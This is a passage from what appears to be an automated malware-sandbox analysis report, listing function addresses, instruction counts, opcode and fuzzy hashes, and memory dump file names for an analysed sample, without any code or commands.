                                                                                                                            • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction ID: af6b9e6b75b6f4d44527ea7727e4b1347e76f90f0f256e63133c3acbb990fd7b
                                                                                                                            • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction Fuzzy Hash: 8CE01234B0930ECBEB10DB94C4D86ED7761EB51711F104765C401872E9DAB86784CA80
                                                                                                                            Function 00007FFD9B7882FE Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e746061befa3360e6d6d7cfca77cb91bc8633c53169afd72dc777b8a19368c7c
                                                                                                                            • Instruction ID: 4ca44f8eacc907ae6cdd9677d211da82e9ab53677971fc2b1005e94d42dccd87
                                                                                                                            • Opcode Fuzzy Hash: e746061befa3360e6d6d7cfca77cb91bc8633c53169afd72dc777b8a19368c7c
                                                                                                                            • Instruction Fuzzy Hash: 6CE0EC30E09A2ECAEBB09B54C8947AC72B2BB08301F9503F5C40DA31A5CB796E819B51
                                                                                                                            Function 00007FFD9B7A8208 Relevance: .0, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7a1000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 740c3a06a138ab9d0e57491fedfa495b8201d5565bb861e640913f077dbbabfa
                                                                                                                            • Instruction ID: 48b528c91bb37d8471eb947bc9ef4281169f24c75f0496ec38fb9506ebaaeec4
                                                                                                                            • Opcode Fuzzy Hash: 740c3a06a138ab9d0e57491fedfa495b8201d5565bb861e640913f077dbbabfa
                                                                                                                            • Instruction Fuzzy Hash: 5CC0803055180D4FC74CEB24C458C6073D0FB59201BC10194D00EC7170D9559D84C741
                                                                                                                            Function 00007FFD9B7844BD Relevance: .0, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6edf4ef39fd4580db67eaf120195833dab973dfcba72f520fea13ba64101c509
                                                                                                                            • Instruction ID: 0cdad95f3ad3f3af4ccc1aa0edcaa08f6a0c5ad70707a6313d47425e8ab9c6c1
                                                                                                                            • Opcode Fuzzy Hash: 6edf4ef39fd4580db67eaf120195833dab973dfcba72f520fea13ba64101c509
                                                                                                                            • Instruction Fuzzy Hash: FAD09E70E2891ECEEB58EF94C865ABD76B1BF44304F400175E429D72DADF7829014740

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B7806FA Relevance: 9.0, Strings: 7, Instructions: 222COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =M_^$M_^%$M_^($M_^*$M_^+$M_^2$M_^4
                                                                                                                            • API String ID: 0-667470765
                                                                                                                            • Opcode ID: 0cdd75d6840911683cd9f600df7fa0b06e6b285b0f697333efa4a442bc15c2f9
                                                                                                                            • Instruction ID: 421eb76c31e958a06d09b9ffb66e23cb2caaab5cf4887949753af03d018e5044
                                                                                                                            • Opcode Fuzzy Hash: 0cdd75d6840911683cd9f600df7fa0b06e6b285b0f697333efa4a442bc15c2f9
                                                                                                                            • Instruction Fuzzy Hash: FC51B46BB8D52A4DE31936A839A68FD3705DF61339B0487F3F02F890D79E1C658249C9
                                                                                                                            Function 00007FFD9B78063D Relevance: 7.8, Strings: 6, Instructions: 297COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =M_^$M_^($M_^*$M_^+$M_^2$M_^4
                                                                                                                            • API String ID: 0-2669795199
                                                                                                                            • Opcode ID: c7363fc0b1ad00004f39f40aa5a3d568aadbdecfa37237fea4cd4a19eae63bcd
                                                                                                                            • Instruction ID: b2d476ffd19997ad234100e74d0fd1db783ce08a0071fe2398154569ae5c5315
                                                                                                                            • Opcode Fuzzy Hash: c7363fc0b1ad00004f39f40aa5a3d568aadbdecfa37237fea4cd4a19eae63bcd
                                                                                                                            • Instruction Fuzzy Hash: 2A81261BB8D92A0DE31877AD79A28FD7701DFA1339B0447F3F16E890D79E18608249D5
                                                                                                                            Function 00007FFD9B7806D3 Relevance: 5.2, Strings: 4, Instructions: 226COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M_^*$M_^+$M_^2$M_^4
                                                                                                                            • API String ID: 0-1616130478
                                                                                                                            • Opcode ID: 40d02c4e7952657098d774033b7051d63839c2f35bbd078d8c461783d0604eae
                                                                                                                            • Instruction ID: c86d23a7e025d968d72934d9aba778a1369aa11ba2357ee5694e651c43545c46
                                                                                                                            • Opcode Fuzzy Hash: 40d02c4e7952657098d774033b7051d63839c2f35bbd078d8c461783d0604eae
                                                                                                                            • Instruction Fuzzy Hash: 6951B12BB8C52A4DE31977A835A68FD3701CF61339B0487F7F16E890DB5E1C658249C9

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B780D48 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5Y_H
                                                                                                                            • API String ID: 0-3237497481
                                                                                                                            • Opcode ID: 593e6cec6ec61dce13a00a40fd585d5a3f7e24f0084ec7485056daeaac119476
                                                                                                                            • Instruction ID: 51fa45b3939574c914885907425849ebb1e246abd4c0c33a623f035c90b53524
                                                                                                                            • Opcode Fuzzy Hash: 593e6cec6ec61dce13a00a40fd585d5a3f7e24f0084ec7485056daeaac119476
                                                                                                                            • Instruction Fuzzy Hash: 45911275A19E8D8FE759DF6888697AA7FE1FF56301F0102BAD04AD72E2DE781810C740
                                                                                                                            Function 00007FFD9B7808D0 Relevance: .2, Instructions: 164COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3407b16a374ae5c07f58a5c9dd7310dbf26ec3f590d183e59a8132a1755c3e89
                                                                                                                            • Instruction ID: 425ea1bf1dbe95313f87e5651d42a7f59b8da8e50150900d03b670150c72d284
                                                                                                                            • Opcode Fuzzy Hash: 3407b16a374ae5c07f58a5c9dd7310dbf26ec3f590d183e59a8132a1755c3e89
                                                                                                                            • Instruction Fuzzy Hash: 67413616B0EA5E0EE315B6BC64E65FD7B81DF45321B1902FFE44AC61F7DE18A8428280
                                                                                                                            Function 00007FFD9B780910 Relevance: .2, Instructions: 153COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0bdaa4c7e585794dea7b959877ab8da1ae773735ac39566cf58fda22a8d432fd
                                                                                                                            • Instruction ID: f3fa01de5647050ee573d7a3f02426d89ae5a0f7d1e1acbcc9fcf3dd39c78fea
                                                                                                                            • Opcode Fuzzy Hash: 0bdaa4c7e585794dea7b959877ab8da1ae773735ac39566cf58fda22a8d432fd
                                                                                                                            • Instruction Fuzzy Hash: 93414916B4EA5A0EE318B6BC60AA5FD7B81DF45321B1501FFE44EC71F7CE18A8428280
                                                                                                                            Function 00007FFD9B780960 Relevance: .1, Instructions: 118COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4032c31d9356b3f7cfd768e8f57a3c38f71d8d5a62a6b386a78876cc1e7365fa
                                                                                                                            • Instruction ID: dd9030c0fd6285f02b0104d85c91762c78c407e706cef2f4d977e49b33f57a88
                                                                                                                            • Opcode Fuzzy Hash: 4032c31d9356b3f7cfd768e8f57a3c38f71d8d5a62a6b386a78876cc1e7365fa
                                                                                                                            • Instruction Fuzzy Hash: 1F310812B0EA5E1EE35876BC64AA5F977C1DF58322B1501BEE40EC71F7DD18A8428285
                                                                                                                            Function 00007FFD9B780998 Relevance: .1, Instructions: 108COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7b00dee4ba4ae5edd60670e0f60b28121cf6c003d0365fefd58a19ade00df3ff
                                                                                                                            • Instruction ID: bf530869b4a78c42cdde50715605b161583ed929df3d35dcacfdc1151a009fb6
                                                                                                                            • Opcode Fuzzy Hash: 7b00dee4ba4ae5edd60670e0f60b28121cf6c003d0365fefd58a19ade00df3ff
                                                                                                                            • Instruction Fuzzy Hash: 17315E20B0AE5D0FE358A66C84B96BA77C2EF98312B1101BDD40EC32F7DD28ED428241
                                                                                                                            Function 00007FFD9B780C25 Relevance: .1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 797c1bb5c2c836172f3236bc5a8193944283306eccd515d9c5859a9687026145
                                                                                                                            • Instruction ID: 116703c73e7f1b9966292bdf0ee1e77becf5044a7bd1b7f0f26592ed940c2268
                                                                                                                            • Opcode Fuzzy Hash: 797c1bb5c2c836172f3236bc5a8193944283306eccd515d9c5859a9687026145
                                                                                                                            • Instruction Fuzzy Hash: 3021DD36B0D74D8ED721AB6898650EC7B60EF52311F1543F7D054861E2D93866458781
                                                                                                                            Function 00007FFD9B786872 Relevance: .1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a66a8343c496b2b54687e3ce4438d624faf36b7279467c0d8cf6ee15d2bfefc5
                                                                                                                            • Instruction ID: d7492c2b9d05b442da8271701e8fa7e66cf04bff9846cd80a90c47e2b2ffb465
                                                                                                                            • Opcode Fuzzy Hash: a66a8343c496b2b54687e3ce4438d624faf36b7279467c0d8cf6ee15d2bfefc5
                                                                                                                            • Instruction Fuzzy Hash: 75117320E19E1D4EEBB4E65894B56B87290FF18701F5102F9D44EE72B2EE38AE444740
                                                                                                                            Function 00007FFD9B780C38 Relevance: .1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a4cfa892c5a492d51923783b0726b3fe330f3dbd5160eaa07a34562cfae1d8e0
                                                                                                                            • Instruction ID: e44e193ff35027c2c06144fc2c09d4cc0b86253dbb0fd23893ead4ac4ac4c8f9
                                                                                                                            • Opcode Fuzzy Hash: a4cfa892c5a492d51923783b0726b3fe330f3dbd5160eaa07a34562cfae1d8e0
                                                                                                                            • Instruction Fuzzy Hash: 1C115135B0EB8D8EE7229B6888A51EC7BB0EF52611F1646F7C044DB1F2D93856458781
                                                                                                                            Function 00007FFD9B780C48 Relevance: .0, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0b305d0a6ebc9be9015c777e383aa56e95e0d3a4b67bfa218313d7a1ff2656cd
                                                                                                                            • Instruction ID: 222003890256e98a818809fa2332d7618af9837bd783cd62b748e54aea0f7181
                                                                                                                            • Opcode Fuzzy Hash: 0b305d0a6ebc9be9015c777e383aa56e95e0d3a4b67bfa218313d7a1ff2656cd
                                                                                                                            • Instruction Fuzzy Hash: CE018035A0E78D8FD722DB6488A009C7FB0AF42701F1642E7C044DB1F2DA385A458B81
                                                                                                                            Function 00007FFD9B7869C4 Relevance: .0, Instructions: 39COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                            • Instruction ID: 5c0b2a2d744ae1494450a87314812acb844f3f68d45093d049d84780ec45f3c4
                                                                                                                            • Opcode Fuzzy Hash: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                            • Instruction Fuzzy Hash: 0D013B30A1991E4EEB74E654D8A57F473A1FF54302F1142F9C44EE31B2DE386E954B41
                                                                                                                            Function 00007FFD9B780C50 Relevance: .0, Instructions: 37COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c015325326d995899916c922b51d2a7264f764c1fca31453468c5eeb95e96a16
                                                                                                                            • Instruction ID: 91ce4f0cd4e616eec99ba9c6f925ac936ad876336b0ccaf528421c76ba9bc08c
                                                                                                                            • Opcode Fuzzy Hash: c015325326d995899916c922b51d2a7264f764c1fca31453468c5eeb95e96a16
                                                                                                                            • Instruction Fuzzy Hash: C9017C34A0E78D9FE722DBA488A40ACBFB0AF02701F1542E7C044DB2E2EA385A448741
                                                                                                                            Function 00007FFD9B785E02 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 295be5de14c819c4ae092c4f1160d08268b812797931a69ea4fe50295006181a
                                                                                                                            • Instruction ID: 84a91aee9a46c8bc60cf7ba1878578ca7850248ce8475403dc2e665be041a61e
                                                                                                                            • Opcode Fuzzy Hash: 295be5de14c819c4ae092c4f1160d08268b812797931a69ea4fe50295006181a
                                                                                                                            • Instruction Fuzzy Hash: 38F0C231648A0A8FCB54DF08C894FA973B1FB98311F1586A9D00ED7260DA34EA85DF81
                                                                                                                            Function 00007FFD9B7868B1 Relevance: .0, Instructions: 34COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                            • Instruction ID: be2c484cc6bb5d547de371cef730267c7807a9bbf8b5bacab83cceee3efe4911
                                                                                                                            • Opcode Fuzzy Hash: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                            • Instruction Fuzzy Hash: 55F09630A0990E4AEA74E644E4A57F83391EF04302F1102B9D85EE31B2DD38BE954641
                                                                                                                            Function 00007FFD9B781DC0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                            • Instruction ID: cf7ed3c3850cb40e0cdfd1981f490386eb39531d2b3bce61b01b0f80b3252114
                                                                                                                            • Opcode Fuzzy Hash: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                            • Instruction Fuzzy Hash: 10E01274F0DA1E87F764A184C8A17E97265FF48301F160278D95E933E1CD38AE418655
                                                                                                                            Function 00007FFD9B780D34 Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction ID: 3b939d2fba89b4d7d448400fa20d0d502cb5f49ed896c787ba8d34c837fee806
                                                                                                                            • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction Fuzzy Hash: 8FE01234B0970ECBE710DF94C4D46ED7761FB51712F104365C401872F9DA786784C680
                                                                                                                            Function 00007FFD9B780B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                            • Instruction ID: 255dc556ef29997eeb9b2ee4b1c52152828f479a5dca78d638e0d71585c926ef
                                                                                                                            • Opcode Fuzzy Hash: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                            • Instruction Fuzzy Hash: DCC01230629D0E8FDA40BB28C888824BBA0FB0E316BDA14E0E00CCB1B1D62999908701
                                                                                                                            Function 00007FFD9B7806A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                                                                                                            • Instruction ID: 86d42989edcf4c9769895a42b45c7196896a785eefebc64292555ce20c704d0b
                                                                                                                            • Opcode Fuzzy Hash: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                                                                                                            • Instruction Fuzzy Hash: 38C00205F5BF1E01E52571AA54A60ADB1409FD5A62FE70272D509801B1986E22D5019A
                                                                                                                            Function 00007FFD9B7812B0 Relevance: .0, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                            • Instruction ID: eff9d3d5347216f0b8e7f096ad089938f0d61715b4b9ae681e8db291718d0954
                                                                                                                            • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                            • Instruction Fuzzy Hash: 2DC08C30511C0C8FC908EB28C88490433A0FB09201BC200D0E008C7170D229DCC0C780
                                                                                                                            Function 00007FFD9B784960 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 261d67ba04dff32894286402608206e2efd6f5da9a744681a490103663b2b333
                                                                                                                            • Instruction ID: 3bbc8e812363d2dd1d01ae938e0ab74af09532b66ca61e42d1e498544ec8185f
                                                                                                                            • Opcode Fuzzy Hash: 261d67ba04dff32894286402608206e2efd6f5da9a744681a490103663b2b333
                                                                                                                            • Instruction Fuzzy Hash: 89C08C00F1CD1A07F75A6204087023E08026B44208F8103B0E41F933CECD2C1E0242CB
                                                                                                                            Function 00007FFD9B7806C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                            • Instruction ID: 68a710d829b660329d29d2e1544170900f6d2dfa2cd48f08507e837bc8b8f170
                                                                                                                            • Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                            • Instruction Fuzzy Hash: 99B01200D57E0F00E42431FA08D206570409F44101FC30270D40C801B1985E12D40286

